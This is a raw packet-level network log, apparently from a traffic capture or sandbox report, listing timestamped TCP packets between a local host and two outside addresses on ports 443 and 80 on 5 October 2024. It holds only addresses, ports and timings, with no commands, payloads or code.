                                          Oct 5, 2024 14:49:48.285238981 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285274029 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285295963 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285315037 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285660982 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285702944 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285737991 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285747051 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.285773039 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.285788059 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286070108 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286113024 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286143064 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286149979 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286174059 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286195040 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286758900 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286808968 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286837101 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286844969 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.286860943 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.286879063 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287298918 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287341118 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287370920 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287379026 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287405968 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287420034 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287542105 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287585020 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287607908 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287616014 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287642002 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287657022 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288449049 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288499117 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288522005 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288530111 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288549900 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288563967 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377482891 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377531052 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377626896 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377652884 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377676964 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377696991 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377717972 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377734900 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377868891 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377917051 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.380898952 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.183677912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.183720112 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.183793068 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.195125103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.195158005 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.659120083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.659215927 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.842623949 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.842653036 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.843502045 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.843574047 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.848458052 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.891407967 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120465040 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120512009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120543003 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120568037 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120568991 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120594025 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120605946 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120619059 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120642900 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120646954 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120662928 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120691061 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.121165037 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.121213913 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.121360064 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.121407032 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125262976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125329018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125351906 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125355959 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125372887 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125417948 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.206996918 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207056999 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207057953 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207071066 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207148075 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207411051 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207461119 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207506895 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207511902 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207552910 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207560062 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207895041 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207951069 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207959890 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208014965 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208017111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208026886 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208056927 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208075047 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208734989 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208780050 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208784103 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208825111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209104061 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209147930 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209155083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209192991 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209197044 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209218025 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209238052 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209242105 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209260941 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209295034 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210021019 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210068941 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210072041 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210083008 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210113049 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210144043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210146904 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210200071 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.211864948 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.211915970 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.212080956 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.212126970 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.293977976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294049025 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294099092 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294150114 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294188976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294236898 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294271946 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294346094 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294358015 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294399977 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294445992 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294498920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294548988 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294598103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294651031 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294706106 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294742107 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294796944 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294836044 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294884920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294924021 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294987917 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295027018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295087099 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295130014 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295186043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295284986 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295351982 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295372009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295425892 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296060085 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296133041 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296144009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296195984 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296257019 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296310902 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296343088 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296396971 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296921968 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296977043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380631924 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380733967 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380793095 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380846024 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380847931 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380856991 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380891085 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380913019 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381055117 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381105900 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381150961 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381201029 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381328106 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381376028 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381416082 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381465912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381710052 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381762028 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381792068 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381841898 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381917000 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381972075 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382185936 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382239103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382281065 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382333040 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382606030 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382638931 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382659912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382671118 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382729053 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382729053 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382778883 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382816076 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382836103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382839918 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382855892 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382882118 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382982969 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383038998 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383451939 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383505106 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383548021 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383593082 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383737087 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383770943 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383786917 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383790970 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383804083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383810997 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383860111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383863926 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383904934 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385615110 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385668993 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385700941 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385750055 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385812998 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385843039 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385860920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385865927 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385875940 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385899067 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385922909 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385946035 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385997057 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.467837095 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.467865944 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.467943907 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468010902 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468017101 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468044043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468055010 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468245029 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468287945 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468307972 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468313932 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468355894 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468683958 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468729973 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468753099 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468756914 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468789101 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468810081 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468950033 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468992949 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469023943 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469027996 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469074011 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469079018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469099045 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469103098 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469141006 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469176054 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469177961 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469201088 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469228029 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469260931 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469270945 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469312906 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469353914 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469403982 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.473079920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.473093987 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:51:15.381635904 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.386615038 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.386730909 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.394817114 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.399751902 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879261971 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879292011 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879308939 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879324913 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879343033 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879360914 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879360914 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.879380941 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879411936 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879451990 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.879475117 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.879599094 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879612923 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879645109 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:15.879662037 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.879693985 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.884499073 CEST4994680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:15.889321089 CEST804994684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:30.985245943 CEST5000580192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:30.990325928 CEST805000584.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:30.990413904 CEST5000580192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:31.031192064 CEST5000580192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:31.036355972 CEST805000584.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:31.455564976 CEST805000584.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:31.455770969 CEST5000580192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:32.539904118 CEST5000580192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:32.545173883 CEST805000584.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:33.575391054 CEST5000680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:33.580468893 CEST805000684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:33.580566883 CEST5000680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:33.612529993 CEST5000680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:33.617611885 CEST805000684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:34.065638065 CEST805000684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:34.065793991 CEST5000680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:35.133692026 CEST5000680192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:35.138691902 CEST805000684.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.153675079 CEST5000780192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:36.158603907 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.158740997 CEST5000780192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:36.174041986 CEST5000780192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:36.180257082 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180273056 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180299044 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180319071 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180346012 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180360079 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.180372000 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.181969881 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.181982994 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.624953032 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:36.625066996 CEST5000780192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:37.680505991 CEST5000780192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:37.685467958 CEST805000784.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:38.700318098 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:38.705193043 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:38.705291986 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:38.715034008 CEST5000880192.168.2.484.32.84.32
                                          Oct 5, 2024 14:51:38.720032930 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172595024 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172616959 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172629118 CEST805000884.32.84.32192.168.2.4
                                          Oct 5, 2024 14:51:39.172637939 CEST805000884.32.84.32192.168.2.4
